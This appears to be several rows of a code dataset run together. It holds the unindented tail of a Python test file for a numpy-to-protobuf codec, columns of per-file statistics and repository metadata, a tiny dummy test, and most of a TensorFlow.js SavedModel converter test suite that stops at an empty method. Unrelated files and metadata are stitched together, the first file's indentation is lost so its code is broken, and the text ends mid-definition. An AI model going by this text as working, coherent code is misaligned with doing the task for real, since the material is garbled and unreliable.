"""Dicts of np arrays."""
expected = storage_pb2.Data()
d = expected.dict.values
datum1 = d['golden'].datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(1.618)
datum2 = d['sqrt2'].datum
datum2.shape.dim.add().size = 1
datum2.values.double_values.append(1.41421)
self.assertEqual(
codec.encode({
'golden': np.array([1.618]),
'sqrt2': np.array([1.41421])
}), expected)
def test_encode_mixed_elem_ndarray_dict(self):
"""Dicts of np arrays of different dtypes."""
expected = storage_pb2.Data()
d = expected.dict.values
datum1 = d['mozart_death'].datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(35)
datum2 = d['sqrt3'].datum
datum2.shape.dim.add().size = 1
datum2.values.double_values.append(1.73205)
self.assertEqual(
codec.encode({
'mozart_death': np.array([35]),
'sqrt3': np.array([1.73205])
}), expected)
def test_decode_dict(self):
user_data = storage_pb2.Data()
datum1 = user_data.dict.values['pi'].datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(3.14159265)
datum2 = user_data.dict.values['primes'].datum
datum2.shape.dim.add().size = 5
datum2.values.int64_values.extend([2, 3, 5, 7, 11])
datum3 = user_data.dict.values['negative_squares_doubles'].datum
datum3.shape.dim.add().size = 5
datum3.shape.dim.add().size = 2
datum3.values.int64_values.extend(
[-1, -4, -9, -16, -25, -2, -8, -18, -32, -50])
decoded = codec.decode(user_data)
self.assertIsInstance(decoded, dict)
self.assertIn('pi', decoded)
np.testing.assert_equal(decoded['pi'],
np.array([3.14159265], dtype=np.float64))
self.assertIn('primes', decoded)
np.testing.assert_equal(decoded['primes'],
np.array([2, 3, 5, 7, 11], dtype=np.int64))
self.assertIn('negative_squares_doubles', decoded)
np.testing.assert_equal(
decoded['negative_squares_doubles'],
np.array([[-1, -4], [-9, -16], [-25, -2], [-8, -18], [-32, -50]],
dtype=np.int64))
def test_encode_dict_int_keys(self):
"""Dict with Python int keys."""
expected = storage_pb2.Data()
d = expected.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.bigint_values.append(b'{') # 123 == b'{'
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int64_values.append(456)
self.assertEqual(codec.encode({123: np.int64(456)}), expected)
def test_decode_dict_int_keys(self):
"""Dict with Python int keys."""
user_data = storage_pb2.Data()
d = user_data.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.bigint_values.append(b'{') # 123 == b'{'
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int64_values.append(456)
self.assertEqual(codec.decode(user_data), {123: np.int64(456)})
def test_identity_dict_int_keys(self):
"""Dict with Python int keys."""
self.assertEqual(
codec.decode(codec.encode({123: np.int64(456)})), {123: np.int64(456)})
def test_encode_dict_int64_keys(self):
"""Dict with Python int64 keys."""
expected = storage_pb2.Data()
d = expected.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.int64_values.append(np.int64(1729))
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int32_values.append(12345)
self.assertEqual(codec.encode({np.int64(1729): np.int32(12345)}), expected)
def test_decode_dict_int64_keys(self):
"""Dict with Python int64 keys."""
user_data = storage_pb2.Data()
d = user_data.dict.kvs
t1 = d.values.add().tuple
k1 = t1.values.add().datum
k1.shape.dim.add().size = -438
k1.values.int64_values.append(np.int64(1729))
v1 = t1.values.add().datum
v1.shape.dim.add().size = -438
v1.values.int32_values.append(12345)
self.assertEqual(codec.decode(user_data), {np.int64(1729): np.int32(12345)})
def test_identity_dict_int64_keys(self):
"""Dict with Python int keys."""
self.assertEqual(
codec.decode(codec.encode({np.int64(1729): np.int32(12345)})),
{np.int64(1729): np.int32(12345)})
def test_identity_dict_mixed_keytypes(self):
"""Dict with Python mixed key types."""
data = {123: np.int64(456), np.int64(1729): np.int32(12345), 'hello': True}
self.assertEqual(codec.decode(codec.encode(data)), data)
##############################################################################
#
# Unsupported types tests
#
##############################################################################
@parameterized.named_parameters(
('modules_are_not_supported', np),
('classes_are_not_supported', set),
('functions_are_not_supported', map),
('type_classes_are_not_supported', type(int)),
('sets_are_not_supported', set()),
('complex_numbers_are_not_supported', complex(1, 2)),
)
def test_unsupported_types(self, arg):
"""Ensures that TypeError is raised when an unsupported type is encoded."""
self.assertRaises(TypeError, codec.encode, arg)
if __name__ == '__main__':
absltest.main()
| 41.185768
| 82
| 0.644298
| 8,676
| 65,403
| 4.718303
| 0.050715
| 0.040453
| 0.035201
| 0.048002
| 0.883721
| 0.838919
| 0.785299
| 0.749927
| 0.720002
| 0.704881
| 0
| 0.054762
| 0.160711
| 65,403
| 1,587
| 83
| 41.21172
| 0.690993
| 0.148357
| 0
| 0.577578
| 0
| 0.001794
| 0.055259
| 0.007704
| 0
| 0
| 0
| 0
| 0.221525
| 1
| 0.138117
| false
| 0
| 0.004484
| 0
| 0.143498
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
71f9cf5917f141144e5f8fddb7f9c0b1f2cb2e01
| 105
|
py
|
Python
|
tests/test_dummy.py
|
adamgreig/saltbot
|
f6e991ff4c41447c6e7564b297560e79f3976b5e
|
[
"MIT"
] | 1
|
2021-01-15T04:47:20.000Z
|
2021-01-15T04:47:20.000Z
|
tests/test_dummy.py
|
adamgreig/saltbot
|
f6e991ff4c41447c6e7564b297560e79f3976b5e
|
[
"MIT"
] | 17
|
2015-01-18T06:02:55.000Z
|
2015-03-11T02:46:18.000Z
|
tests/test_dummy.py
|
adamgreig/saltbot
|
f6e991ff4c41447c6e7564b297560e79f3976b5e
|
[
"MIT"
] | null | null | null |
from nose.tools import assert_true
class TestDummy:
def test_good(self):
assert_true(True)
| 15
| 34
| 0.714286
| 15
| 105
| 4.8
| 0.8
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.219048
| 105
| 6
| 35
| 17.5
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
9c000d3ec02a5d009f4ffab25b0fb9667b62c830
| 37,088
|
py
|
Python
|
tfjs-converter/python/tensorflowjs/converters/tf_saved_model_conversion_v2_test.py
|
xhcao/tfjs
|
1a2e5dc1dcb475e6f503e55543c790a5d4df075f
|
[
"Apache-2.0"
] | null | null | null |
tfjs-converter/python/tensorflowjs/converters/tf_saved_model_conversion_v2_test.py
|
xhcao/tfjs
|
1a2e5dc1dcb475e6f503e55543c790a5d4df075f
|
[
"Apache-2.0"
] | null | null | null |
tfjs-converter/python/tensorflowjs/converters/tf_saved_model_conversion_v2_test.py
|
xhcao/tfjs
|
1a2e5dc1dcb475e6f503e55543c790a5d4df075f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for artifact conversion to and from Tensorflow SavedModel v2."""
import base64
import glob
import json
import os
import shutil
import tempfile
import unittest
import tensorflow.compat.v2 as tf
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.tools import freeze_graph
from tensorflow.python.saved_model.save import save
import tensorflow_hub as hub
from tensorflowjs import version
from tensorflowjs.converters import graph_rewrite_util
from tensorflowjs.converters import tf_saved_model_conversion_v2
SAVED_MODEL_DIR = 'saved_model'
HUB_MODULE_DIR = 'hub_module'
FROZEN_MODEL_DIR = 'frozen_model'
class ConvertTest(tf.test.TestCase):
def setUp(self):
super(ConvertTest, self).setUp()
self._tmp_dir = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(ConvertTest, self).tearDown()
def _create_saved_model_v1(self):
"""Create a TensorFlow SavedModel for testing."""
graph = tf.Graph()
with graph.as_default():
x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.compat.v1.get_variable('w', shape=[2, 2])
y = tf.compat.v1.matmul(x, w)
output = tf.compat.v1.nn.softmax(y)
init_op = w.initializer
# Create a builder.
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_dir)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
'serving_default':
tf.compat.v1.saved_model \
.signature_def_utils.predict_signature_def(
inputs={'x': x},
outputs={'output': output})
},
assets_collection=None)
builder.save()
def _create_saved_model_v1_with_hashtable(self):
"""Create a TensorFlow SavedModel V1 with unused hash table for testing."""
graph = tf.Graph()
with graph.as_default():
x = tf.compat.v1.placeholder('int32', [None, 2, 2])
t = tf.compat.v1.to_float(x)
w = tf.compat.v1.get_variable('w', shape=[2, 2])
output = tf.compat.v1.matmul(t, w)
init_op = w.initializer
# Add a hash table that is not used by the output.
keys = tf.constant(['key'])
values = tf.constant([1])
initializer = tf.lookup.KeyValueTensorInitializer(keys, values)
table = tf.lookup.StaticHashTable(initializer, -1)
# Create a builder.
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(
save_dir)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
table.lookup(keys)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
'serving_default':
tf.compat.v1.saved_model \
.signature_def_utils.predict_signature_def(
inputs={'t': t},
outputs={'output': output})
},
assets_collection=None)
builder.save()
def _create_saved_model_with_fusable_conv2d(self, use_bias):
"""Test a basic model with fusable conv2d."""
layers = [
tf.keras.layers.Conv2D(
16, [3, 3], padding='same', use_bias=use_bias),
tf.keras.layers.BatchNormalization(),
tf.keras.layers.ReLU()
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 224, 224, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model_with_fusable_depthwise_conv2d(self):
"""Test a basic model with fusable depthwise conv2d."""
layers = [
tf.keras.layers.DepthwiseConv2D(
1, use_bias=True,
bias_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.ReLU()
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 2, 2, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model_with_prelu(self):
"""Test a basic model with fusable conv2d."""
layers = [
tf.keras.layers.Conv2D(
16, [3, 3], padding='same', use_bias=True,
bias_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.PReLU(alpha_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.DepthwiseConv2D(
1, use_bias=True,
bias_initializer=tf.initializers.constant(0.25)),
tf.keras.layers.PReLU(alpha_initializer=tf.initializers.constant(0.25))
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 224, 224, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model_with_unfusable_prelu(self):
"""Test a basic model with unfusable prelu."""
layers = [
tf.keras.layers.ReLU(),
tf.keras.layers.PReLU(alpha_initializer=tf.initializers.constant(0.25))
]
model = tf.keras.Sequential(layers)
model.predict(tf.ones((1, 224, 3)))
tf.keras.backend.set_learning_phase(0)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
tf.saved_model.save(model, save_dir)
def _create_saved_model(self):
"""Test a basic model with functions to make sure functions are inlined."""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_saved_model_with_fusable_matmul(self):
"""Test a fusable matmul model."""
input_data = constant_op.constant(1., shape=[1, 1])
bias_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v2 = variables.Variable([[2.]])
root.f = def_function.function(
lambda x: tf.nn.relu(tf.nn.bias_add(tf.matmul(x, root.v2),
bias_data)))
to_save = root.f.get_concrete_function(input_data)
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_saved_model_with_control_flow(self):
"""Test a basic model with control flow to inlined."""
@tf.function
def find_next_odd(v):
v1 = v + 1
while tf.equal(v1 % 2, 0):
v1 = v1 + 1
return v1
root = tracking.AutoTrackable()
root.f = find_next_odd
to_save = root.f.get_concrete_function(
tensor_spec.TensorSpec([], dtypes.int32))
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_unsupported_saved_model(self):
root = tracking.AutoTrackable()
root.w = variables.Variable(tf.random.uniform([2, 2]))
@def_function.function
def exported_function(x):
root.x = constant_op.constant([[37.0, -23.0], [1.0, 4.0]])
root.y = tf.matmul(root.x, root.w)
# unsupported op: linalg.diag
root.z = tf.linalg.diag(root.y)
return root.z * x
root.f = exported_function
to_save = root.f.get_concrete_function(
tensor_spec.TensorSpec([], dtypes.float32))
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_saved_model_with_debug_ops(self):
root = tracking.AutoTrackable()
root.w = variables.Variable(tf.random.uniform([2, 2]))
@def_function.function
def exported_function(x):
root.x = constant_op.constant([[37.0, -23.0], [1.0, 4.0]])
root.y = tf.matmul(root.x, root.w)
tf.compat.v1.Print(root.x, [root.x])
tf.compat.v1.Assert(tf.greater(tf.reduce_max(root.x), 0), [root.x])
tf.compat.v1.check_numerics(root.x, 'NaN found')
return root.y * x
root.f = exported_function
to_save = root.f.get_concrete_function(
tensor_spec.TensorSpec([], dtypes.float32))
save_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
save(root, save_dir, to_save)
def _create_hub_module(self):
# Module function that doubles its input.
def double_module_fn():
w = tf.Variable([2.0, 4.0])
x = tf.compat.v1.placeholder(dtype=tf.float32)
hub.add_signature(inputs=x, outputs=x*w)
graph = tf.Graph()
with graph.as_default():
spec = hub.create_module_spec(double_module_fn)
m = hub.Module(spec)
# Export the module.
with tf.compat.v1.Session(graph=graph) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
m.export(os.path.join(self._tmp_dir, HUB_MODULE_DIR), sess)
def create_frozen_model(self):
graph = tf.Graph()
saved_model_dir = os.path.join(self._tmp_dir, FROZEN_MODEL_DIR)
with graph.as_default():
x = tf.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.Variable(tf.random.uniform([2, 2]))
y = tf.matmul(x, w)
tf.nn.softmax(y)
init_op = w.initializer
# Create a builder
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(
saved_model_dir)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map=None,
assets_collection=None)
builder.save()
frozen_file = os.path.join(self._tmp_dir, FROZEN_MODEL_DIR, 'model.frozen')
freeze_graph.freeze_graph(
'',
'',
True,
'',
"Softmax",
'',
'',
frozen_file,
True,
'',
saved_model_tags=tf.compat.v1.saved_model.tag_constants.SERVING,
input_saved_model_dir=saved_model_dir)
def test_convert_saved_model_v1(self):
  """Converting a TF1 SavedModel yields a valid model.json and weight shard."""
  self._create_saved_model_v1()
  input_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  output_dir = os.path.join(input_dir, 'js')
  tf_saved_model_conversion_v2.convert_tf_saved_model(input_dir, output_dir)

  # Check model.json and weights manifest.
  with open(os.path.join(output_dir, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  manifest = model_json['weightsManifest']
  self.assertCountEqual(manifest[0]['paths'], ['group1-shard1of1.bin'])
  self.assertIn('weights', manifest[0])

  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(model_json['convertedBy'],
                   'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'], tf.__version__)
  self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def test_convert_saved_model_v1_with_hashtable(self):
  """A TF1 SavedModel with a hash table converts with an initializer graph
  and serializes the table's keys/values as weights."""
  self._create_saved_model_v1_with_hashtable()
  input_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  output_dir = os.path.join(input_dir, 'js')
  tf_saved_model_conversion_v2.convert_tf_saved_model(
      input_dir,
      output_dir
  )
  # The table's string keys and int32 values are stored in the single
  # shard next to the float variable `w`.
  expected_weights_manifest = [{
      'paths': ['group1-shard1of1.bin'],
      'weights': [
          {'dtype': 'float32', 'name': 'w', 'shape': [2, 2]},
          {'dtype': 'string', 'name': 'Const', 'shape': [1]},
          {'dtype': 'int32', 'name': 'Const_1', 'shape': [1]}
      ]}]
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'js')
  # Check model.json and weights manifest.
  with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  # A separate initializer graph must be emitted for the hash table.
  self.assertTrue(model_json['modelInitializer'])
  # The placeholder's shape attribute must survive conversion intact.
  for node in model_json['modelTopology']['node']:
    if node['name'] == 'ToFloat' and node['op'] == 'Placeholder':
      self.assertEqual(node['attr']['shape'],
                       {'shape': {'dim': [
                           {'size': '-1'}, {'size': '2'}, {'size': '2'}]}})
  weights_manifest = model_json['weightsManifest']
  self.assertEqual(weights_manifest, expected_weights_manifest)
  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(
      model_json['convertedBy'],
      'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'],
                   tf.__version__)
  self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def test_convert_saved_model(self):
  """Round-trip a TF2 SavedModel through the converter and verify artifacts."""
  self._create_saved_model()
  model_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  # Convert in place: the tfjs artifacts land next to the SavedModel.
  tf_saved_model_conversion_v2.convert_tf_saved_model(model_dir, model_dir)

  # Check model.json and weights manifest.
  with open(os.path.join(model_dir, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  manifest = model_json['weightsManifest']
  self.assertCountEqual(manifest[0]['paths'], ['group1-shard1of1.bin'])
  self.assertIn('weights', manifest[0])
def test_convert_saved_model_with_fused_conv2d(self):
  """Conv2D + BiasAdd + Relu are fused into a single _FusedConv2D node.

  Runs the whole scenario twice, with and without a bias term.
  """
  for use_bias in [True, False]:
    self._create_saved_model_with_fusable_conv2d(use_bias)
    tf_saved_model_conversion_v2.convert_tf_saved_model(
        os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
        os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
    )
    tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
    # Check model.json and weights manifest.
    with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
      model_json = json.load(f)
    self.assertTrue(model_json['modelTopology'])
    self.assertIsNot(model_json['modelTopology']['versions'], None)
    signature = model_json['userDefinedMetadata']['signature']
    self.assertIsNot(signature, None)
    self.assertIsNot(signature['inputs'], None)
    self.assertIsNot(signature['outputs'], None)
    nodes = model_json['modelTopology']['node']
    fused_op = None
    for node in nodes:
      # None of the un-fused source ops may survive anywhere in the graph.
      self.assertNotIn('BatchNorm', node['op'])
      self.assertNotIn('Relu', node['op'])
      self.assertNotIn('BiasAdd', node['op'])
      if node['op'] == '_FusedConv2D':
        fused_op = node
    self.assertIsNot(fused_op, None)
    # fused_ops attr values are base64-encoded byte strings in the JSON.
    self.assertEqual(
        base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][0]),
        b'BiasAdd')
    self.assertEqual(
        base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][1]),
        b'Relu')
    # Check meta-data in the artifact JSON.
    self.assertEqual(model_json['format'], 'graph-model')
    self.assertEqual(
        model_json['convertedBy'],
        'TensorFlow.js Converter v%s' % version.version)
    self.assertEqual(model_json['generatedBy'],
                     tf.__version__)
    self.assertTrue(
        glob.glob(
            os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_fused_matmul(self):
  """MatMul + BiasAdd + Relu are fused into a single fused-matmul node."""
  self._create_saved_model_with_fusable_matmul()
  tf_saved_model_conversion_v2.convert_tf_saved_model(
      os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
      os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  )
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  # Check model.json and weights manifest.
  with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  nodes = model_json['modelTopology']['node']
  fused_op = None
  for node in nodes:
    # The plain MatMul and its activation/bias ops must be gone.
    self.assertNotEqual(node['op'], 'MatMul')
    self.assertNotIn('Relu', node['op'])
    self.assertNotIn('BiasAdd', node['op'])
    if node['op'] == graph_rewrite_util.FUSED_MATMUL:
      fused_op = node
  self.assertIsNot(fused_op, None)
  # The transpose flags must be carried over onto the fused node.
  self.assertIsNot(fused_op['attr']['transpose_a'], None)
  self.assertIsNot(fused_op['attr']['transpose_b'], None)
  # fused_ops attr values are base64-encoded byte strings in the JSON.
  self.assertEqual(
      base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][0]),
      b'BiasAdd')
  self.assertEqual(
      base64.b64decode(fused_op['attr']['fused_ops']['list']['s'][1]),
      b'Relu')
  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(
      model_json['convertedBy'],
      'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'],
                   tf.__version__)
  self.assertTrue(
      glob.glob(
          os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_fused_depthwise_conv2d(self):
  """DepthwiseConv2d + BiasAdd + Relu are fused into one node."""
  self._create_saved_model_with_fusable_depthwise_conv2d()
  model_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tf_saved_model_conversion_v2.convert_tf_saved_model(model_dir, model_dir)

  # Check model.json and weights manifest.
  with open(os.path.join(model_dir, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)

  fused_op = None
  for node in model_json['modelTopology']['node']:
    # None of the un-fused source ops may survive in the graph.
    self.assertNotIn('BatchNorm', node['op'])
    self.assertNotIn('Relu', node['op'])
    self.assertNotIn('BiasAdd', node['op'])
    if node['op'] == graph_rewrite_util.FUSED_DEPTHWISE_CONV2D:
      fused_op = node
  self.assertIsNot(fused_op, None)
  self.assertIsNot(fused_op['attr']['dilations'], None)
  self.assertIsNot(fused_op['attr']['strides'], None)
  # fused_ops entries are base64-encoded byte strings in the JSON.
  encoded = fused_op['attr']['fused_ops']['list']['s']
  self.assertEqual(base64.b64decode(encoded[0]), b'BiasAdd')
  self.assertEqual(base64.b64decode(encoded[1]), b'Relu')

  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(model_json['convertedBy'],
                   'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'], tf.__version__)
  self.assertTrue(glob.glob(os.path.join(model_dir, 'group*-*')))
def test_convert_saved_model_with_prelu(self):
  """Prelu is fused into the conv / depthwise-conv nodes, not kept standalone.

  After conversion there must be no standalone Prelu node; both the
  _FusedConv2D and the fused depthwise node carry [BiasAdd, Prelu] in
  their fused_ops list with num_args == 2 (bias + alpha).
  """
  self._create_saved_model_with_prelu()
  tf_saved_model_conversion_v2.convert_tf_saved_model(
      os.path.join(self._tmp_dir, SAVED_MODEL_DIR),
      os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  )
  tfjs_path = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  # Check model.json and weights manifest.
  with open(os.path.join(tfjs_path, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)
  nodes = model_json['modelTopology']['node']
  prelu_op = None
  fused_op = None
  depthwise_fused_op = None
  for node in nodes:
    if node['op'] == 'Prelu':
      prelu_op = node
    if node['op'] == '_FusedConv2D':
      fused_op = node
    if node['op'] == graph_rewrite_util.FUSED_DEPTHWISE_CONV2D:
      depthwise_fused_op = node
  # Fix: assertIsNone replaces assertTrue(prelu_op is None) so a failure
  # reports the unexpected node instead of just "False is not true".
  self.assertIsNone(prelu_op)
  self.assertIsNot(fused_op, None)
  self.assertIsNot(depthwise_fused_op, None)
  # fused_ops entries are base64-encoded byte strings in the JSON.
  fused_ops = list(map(base64.b64decode,
                       fused_op['attr']['fused_ops']['list']['s']))
  self.assertEqual(fused_ops, [b'BiasAdd', b'Prelu'])
  self.assertEqual(fused_op['attr']['num_args']['i'], '2')
  depthwise_fused_ops = list(
      map(base64.b64decode,
          depthwise_fused_op['attr']['fused_ops']['list']['s']))
  self.assertEqual(depthwise_fused_ops, [b'BiasAdd', b'Prelu'])
  self.assertEqual(depthwise_fused_op['attr']['num_args']['i'], '2')
  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(
      model_json['convertedBy'],
      'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'],
                   tf.__version__)
  self.assertTrue(
      glob.glob(
          os.path.join(self._tmp_dir, SAVED_MODEL_DIR, 'group*-*')))
def test_convert_saved_model_with_unfusable_prelu(self):
  """A Prelu that cannot be fused survives as a standalone Prelu node."""
  self._create_saved_model_with_unfusable_prelu()
  model_dir = os.path.join(self._tmp_dir, SAVED_MODEL_DIR)
  tf_saved_model_conversion_v2.convert_tf_saved_model(model_dir, model_dir)

  # Check model.json and weights manifest.
  with open(os.path.join(model_dir, 'model.json'), 'rt') as f:
    model_json = json.load(f)
  self.assertTrue(model_json['modelTopology'])
  self.assertIsNot(model_json['modelTopology']['versions'], None)
  signature = model_json['userDefinedMetadata']['signature']
  self.assertIsNot(signature, None)
  self.assertIsNot(signature['inputs'], None)
  self.assertIsNot(signature['outputs'], None)

  # Locate the surviving standalone Prelu node.
  prelu_op = next(
      (node for node in model_json['modelTopology']['node']
       if node['op'] == 'Prelu'),
      None)
  self.assertTrue(prelu_op)

  # Check meta-data in the artifact JSON.
  self.assertEqual(model_json['format'], 'graph-model')
  self.assertEqual(model_json['convertedBy'],
                   'TensorFlow.js Converter v%s' % version.version)
  self.assertEqual(model_json['generatedBy'], tf.__version__)
  self.assertTrue(glob.glob(os.path.join(model_dir, 'group*-*')))
def test_convert_saved_model_with_control_flow(self):
